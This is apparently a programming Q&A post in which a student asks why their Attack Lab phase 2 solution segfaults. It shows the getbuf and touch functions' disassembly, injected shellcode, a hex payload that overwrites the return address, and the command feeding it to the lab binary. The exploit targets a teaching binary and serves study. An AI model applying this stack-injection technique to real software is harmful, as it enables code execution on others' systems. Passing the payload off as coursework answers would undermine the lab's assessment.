# Attacklab phase2 You caused a segmentation fault

Tags: assembly, segmentation-fault, stack, x86-64, buffer-overflow

this is my attack lab getbuf and touch1 , touch 2 information:

```
00000000004018c2 <getbuf>:
  4018c2:   48 83 ec 18             sub    $0x18,%rsp
  4018c6:   48 89 e7                mov    %rsp,%rdi
  4018c9:   e8 7e 02 00 00          callq  401b4c <Gets>
  4018ce:   b8 01 00 00 00          mov    $0x1,%eax
  4018d3:   48 83 c4 18             add    $0x18,%rsp
  4018d7:   c3                      retq   

00000000004018d8 <touch1>:
  4018d8:   48 83 ec 08             sub    $0x8,%rsp
  4018dc:   c7 05 16 3c 20 00 01    movl   $0x1,0x203c16(%rip)        # 6054fc <vlevel>
  4018e3:   00 00 00 
  4018e6:   bf 57 32 40 00          mov    $0x403257,%edi
  4018eb:   e8 d0 f3 ff ff          callq  400cc0 <puts@plt>
  4018f0:   bf 01 00 00 00          mov    $0x1,%edi
  4018f5:   e8 a7 04 00 00          callq  401da1 <validate>
  4018fa:   bf 00 00 00 00          mov    $0x0,%edi
  4018ff:   e8 2c f5 ff ff          callq  400e30 <exit@plt>

0000000000401904 <touch2>:
  401904:   48 83 ec 08             sub    $0x8,%rsp
  401908:   89 fa                   mov    %edi,%edx
  40190a:   c7 05 e8 3b 20 00 02    movl   $0x2,0x203be8(%rip)        # 6054fc <vlevel>
  401911:   00 00 00 
  401914:   39 3d ea 3b 20 00       cmp    %edi,0x203bea(%rip)        # 605504 <cookie>
  40191a:   74 28                   je     401944 <touch2+0x40>
  40191c:   be a8 32 40 00          mov    $0x4032a8,%esi
  401921:   bf 01 00 00 00          mov    $0x1,%edi
  401926:   b8 00 00 00 00          mov    $0x0,%eax
  40192b:   e8 b0 f4 ff ff          callq  400de0 <__printf_chk@plt>
  401930:   bf 02 00 00 00          mov    $0x2,%edi
  401935:   e8 2c 05 00 00          callq  401e66 <fail>
  40193a:   bf 00 00 00 00          mov    $0x0,%edi
  40193f:   e8 ec f4 ff ff          callq  400e30 <exit@plt>
  401944:   be 80 32 40 00          mov    $0x403280,%esi
  401949:   bf 01 00 00 00          mov    $0x1,%edi
  40194e:   b8 00 00 00 00          mov    $0x0,%eax
  401953:   e8 88 f4 ff ff          callq  400de0 <__printf_chk@plt>
  401958:   bf 02 00 00 00          mov    $0x2,%edi
  40195d:   e8 3f 04 00 00          callq  401da1 <validate>
  401962:   eb d6                   jmp    40193a <touch2+0x36>
```

I have done all these steps for phase 2:

1. Vim cookie.txt we have address 0x4b7a4937 in it
2. in Vim phase2.s write bellow and save.
   mov $0x4b7a4937, %rdi
   ret
3. gcc -c phase2.s
4. objdump -d phase2.o you will get bellow:

phase2.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <.text>:
0:   48 c7 c7 37 49 7a 4b    mov    $0x4b7a4937,%rdi
7:   c3                      retq

5. Save above in vim phase2.asm
6. Save answers in phase2.txt
   48 c7 c7 37 49 7a 4b c3     // part 4 answer
   00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00
   98 28 61 55 00 00 00 00     // part 8 answer
   04 19 40 00 00 00 00 00         // touch 2 address
7. gdb ctarget > b getbuf > r > info r
   rsp            0x556128b0
8. 0x556128b0 - 0x18 = 0x55612898
9. cat phase2.txt | ./hex2raw | ./ctarget

after running i will get bellow error:

```
Cookie: 0x4b7a4937
Type string:Touch2!: You called touch2(0x4b7a4937)
Valid solution for level 2 with target ctarget
Ouch!: You caused a segmentation fault!
Better luck next time
FAILED
```

I cant find what is the problem of my answer. I have followed youtube and github and with all i will get the same answers.

Comment: This is not enough information. Use your debugger to see where the fault is. Likely you have messed up the stack. It's unclear what you are overwriting with your payload.